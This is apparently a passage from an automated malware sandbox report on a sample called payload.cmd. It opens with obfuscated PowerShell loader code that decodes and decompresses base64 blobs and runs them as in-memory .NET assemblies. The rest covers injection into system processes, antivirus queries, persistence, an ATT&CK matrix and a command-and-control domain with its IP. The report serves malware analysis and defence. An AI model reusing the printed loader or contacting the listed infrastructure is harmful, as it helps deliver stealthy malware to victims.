[blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $mnylh.copyto($mxjbu); $mnylh.dispose(); $vcvep.dispose(); $mxjbu.dispose(); $mxjbu.toarray();}function coezm($exedy,$gmyop){ invoke-expression '$ucfsw=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$exedy);'.replace('blck', ''); invoke-expression '$tehqk=$ucfsw.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$tehqk.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gmyop)blck;'.replace('blck', '');}$tvqdd = 'c:\windows\$rbx-onimai2\$rbx-co2.bat';$host.ui.rawui.windowtitle = $tvqdd;$kjvvr=[system.io.file]::readalltext($tvqdd).split([environment]::newline);foreach ($ghynt in $kjvvr) { if ($ghynt.startswith(':: ')) { $envtr=$ghynt.substring(3); break; }}$ulnbj=[string[]]$envtr.split('\');invoke-expression '$hdtzf=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[0])));'.replace('blck', '');invoke-expression '$timgz=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[1])));'.replace('blck', '');coezm $hdtzf (,[string[]] (''));coezm $timgz (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\dllhost.exeCode function: 41_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,41_2_0000000140002300
Source: C:\Windows\System32\dllhost.exeCode function: 41_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,41_2_0000000140002300
Source: dwm.exe, 0000002D.00000000.2092393360.00000262EB2B8000.00000004.00000020.00020000.00000000.sdmp, dwm.exe, 0000002D.00000002.2639184711.00000262EB2B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerd
Source: conhost.exe, 00000015.00000002.2574663324.00000286D6850000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 0000001D.00000002.2609079733.0000025784A60000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000002A.00000002.2602372188.000001CA7D6F0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
Source: conhost.exe, 00000015.00000002.2574663324.00000286D6850000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 0000001D.00000002.2609079733.0000025784A60000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000002A.00000002.2602372188.000001CA7D6F0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
Source: conhost.exe, 00000015.00000002.2574663324.00000286D6850000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 0000001D.00000002.2609079733.0000025784A60000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000002A.00000002.2602372188.000001CA7D6F0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: ?Program Manager
Source: conhost.exe, 00000015.00000002.2574663324.00000286D6850000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 0000001D.00000002.2609079733.0000025784A60000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000002A.00000002.2602372188.000001CA7D6F0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
Source: C:\Windows\System32\cmd.exeCode function: 20_3_000002527DEC2AF0 cpuid 20_3_000002527DEC2AF0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\$rbx-9pdB1aHK VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\$rbx-9pdB1aHK VolumeInformation
Source: C:\Windows\System32\dllhost.exeCode function: 41_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,41_2_0000000140002300
Source: C:\Windows\System32\cmd.exeCode function: 20_2_000002527DEE8090 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,20_2_000002527DEE8090
Source: dllhost.exe, Microsoft-Windows-Diagnostics-Performance%4Operational.evtx.53.drBinary or memory string: MsMpEng.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts141
Windows Management Instrumentation
1
Scripting
1
DLL Side-Loading
1
Deobfuscate/Decode Files or Information
1
Credential API Hooking
1
System Time Discovery
Remote Services1
Archive Collected Data
1
Ingress Tool Transfer
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts12
Native API
1
DLL Side-Loading
1
Access Token Manipulation
1
Obfuscated Files or Information
11
Input Capture
2
File and Directory Discovery
Remote Desktop Protocol1
Credential API Hooking
21
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts22
Command and Scripting Interpreter
11
Scheduled Task/Job
813
Process Injection
1
Software Packing
Security Account Manager143
System Information Discovery
SMB/Windows Admin Shares11
Input Capture
1
Non-Standard Port
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts11
Scheduled Task/Job
31
Registry Run Keys / Startup Folder
11
Scheduled Task/Job
1
DLL Side-Loading
NTDS481
Security Software Discovery
Distributed Component Object ModelInput Capture2
Non-Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud Accounts1
PowerShell
Network Logon Script31
Registry Run Keys / Startup Folder
1
File Deletion
LSA Secrets2
Process Discovery
SSHKeylogging13
Application Layer Protocol
Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
Rootkit
Cached Domain Credentials261
Virtualization/Sandbox Evasion
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
Masquerading
DCSync1
Application Window Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Modify Registry
Proc Filesystem1
System Network Configuration Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt261
Virtualization/Sandbox Evasion
/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
Access Token Manipulation
Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd813
Process Injection
Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task2
Hidden Files and Directories
KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1524983 Sample: payload.cmd Startdate: 03/10/2024 Architecture: WINDOWS Score: 100 81 azure-winsecure.com 2->81 83 ipwho.is 2->83 95 Suricata IDS alerts for network traffic 2->95 97 Malicious sample detected (through community Yara rule) 2->97 99 .NET source code references suspicious native API functions 2->99 101 14 other signatures 2->101 13 cmd.exe 1 2->13         started        16 powershell.exe 2->16         started        signatures3 process4 signatures5 131 Suspicious powershell command line found 13->131 133 Suspicious command line found 13->133 18 powershell.exe 33 13->18         started        22 WMIC.exe 1 13->22         started        24 WMIC.exe 1 13->24         started        30 4 other processes 13->30 135 Writes to foreign memory regions 16->135 137 Modifies the context of a thread in another process (thread injection) 16->137 139 Injects a PE file into a foreign processes 16->139 26 dllhost.exe 16->26         started        28 conhost.exe 16->28         started        process6 file7 79 C:\Windows\$rbx-onimai2\$rbx-CO2.bat, DOS 18->79 dropped 103 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 18->103 105 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 18->105 107 Uses schtasks.exe or at.exe to add and modify task schedules 18->107 115 4 other signatures 18->115 32 cmd.exe 1 18->32         started        35 WerFault.exe 20 16 18->35         started        109 Injects code into the Windows Explorer (explorer.exe) 26->109 111 Contains functionality to inject code into remote processes 26->111 113 Writes to foreign memory regions 26->113 117 3 other signatures 26->117 37 lsass.exe 26->37 injected 39 winlogon.exe 26->39 injected 41 svchost.exe 26->41 injected 43 16 other processes 26->43 signatures8 process9 signatures10 89 Suspicious powershell command line found 32->89 45 powershell.exe 32->45         started        47 conhost.exe 32->47         started        49 cmd.exe 1 32->49         started        91 Writes to foreign memory regions 37->91 process11 process12 51 cmd.exe 1 45->51         started        signatures13 119 Suspicious powershell command line found 51->119 121 Suspicious command line found 51->121 54 powershell.exe 51->54         started        58 WMIC.exe 1 51->58         started        60 WMIC.exe 1 51->60         started        62 4 other processes 51->62 process14 dnsIp15 85 azure-winsecure.com 154.216.20.132, 49719, 6969 SKHT-ASShenzhenKatherineHengTechnologyInformationCo Seychelles 54->85 87 ipwho.is 195.201.57.90, 443, 49720 HETZNER-ASDE Germany 54->87 123 Creates autostart registry keys with suspicious values (likely registry only malware) 54->123 125 Creates autostart registry keys with suspicious names 54->125 127 Creates an autostart registry key pointing to binary in C:\Windows 54->127 129 6 other signatures 54->129 64 powershell.exe 54->64         started        67 schtasks.exe 54->67         started        69 WerFault.exe 54->69         started        71 WerFault.exe 54->71         started        signatures16 process17 signatures18 93 Injects a PE file into a foreign processes 64->93 73 conhost.exe 64->73         started        75 powershell.exe 64->75         started        77 conhost.exe 67->77         started        process19

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
payload.cmd0%ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://nuget.org/NuGet.exe0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
https://go.micro0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
https://aka.ms/pscore60%URL Reputationsafe
http://schemas.xmlsoap.org/ws/2005/02/trust0%URL Reputationsafe
http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://nuget.org/nuget.exe0%URL Reputationsafe
https://aka.ms/pscore680%URL Reputationsafe
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd0%URL Reputationsafe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
NameIPActiveMaliciousAntivirus DetectionReputation
bg.microsoft.map.fastly.net
199.232.214.172
truefalse
    unknown
    ipwho.is
    195.201.57.90
    truefalse
      unknown
      azure-winsecure.com
      154.216.20.132
      truetrue
